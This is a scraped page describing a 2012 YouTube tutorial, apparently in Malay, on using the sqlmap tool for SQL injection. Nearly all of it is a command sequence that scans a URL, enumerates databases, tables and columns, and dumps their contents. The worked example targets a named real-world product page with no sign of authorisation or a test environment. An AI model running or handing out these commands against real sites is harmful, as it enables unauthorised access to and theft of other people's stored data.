Tutorials sqlmap

Published: 16 July 2012
on channel: Alboraaq DotMy
2,414
3

visit my blog and my fan page
blog=http://www.alboraaqdotmy.com/
facebook page=https://www.facebook.com/AlboraaqDotM...

‎[Cara nk incjet guna sqlmap...]

1-Python 2.7 (http://www.python.org/ftp/python/2.7....)
2-Sqlmap (http://sqlmap.sourceforge.net/)
-----------------------------------------------
For scanning url
./sqlmap.py -u[url]

For getting Database
./sqlmap.py -u[url] --dbs

For Getting tables
./sqlmap.py -u [url] --tables -D [database]

For getting Column
./sqlmap.py -u [url] --columns -T [table name] -D [databasename]

for Dumping whole column.
./sqlmap.py -u [url] --dump --columns -T [table name] -D [databasename]

For specific column dump
./sqlmap.py -u [url] --dump -C [column name] -T [table name] -D [database name]
--------------------------------------------------
[cth]

c:\sqlmap\sqlmap.py -u http://www.sourcecf.com/product-page....
c:\sqlmap\sqlmap.py -u http://www.sourcecf.com/product-page.... --dbs
c:\sqlmap\sqlmap.py -u http://www.sourcecf.com/product-page.... -D [databasename] --tables
c:\sqlmap\sqlmap.py -u http://www.sourcecf.com/product-page.... -D [databasename] -T [table name] --columns
c:\sqlmap\sqlmap.py -u http://www.sourcecf.com/product-page.... -D [databasename] -T [table name] --dump


On this page of the site you can watch the video online Tutorials sqlmap with a duration of hours minute second in good quality, which was uploaded by the user Alboraaq DotMy 16 July 2012, share the link with friends and acquaintances, this video has already been watched 2,414 times on youtube and it was liked by 3 viewers. Enjoy your viewing!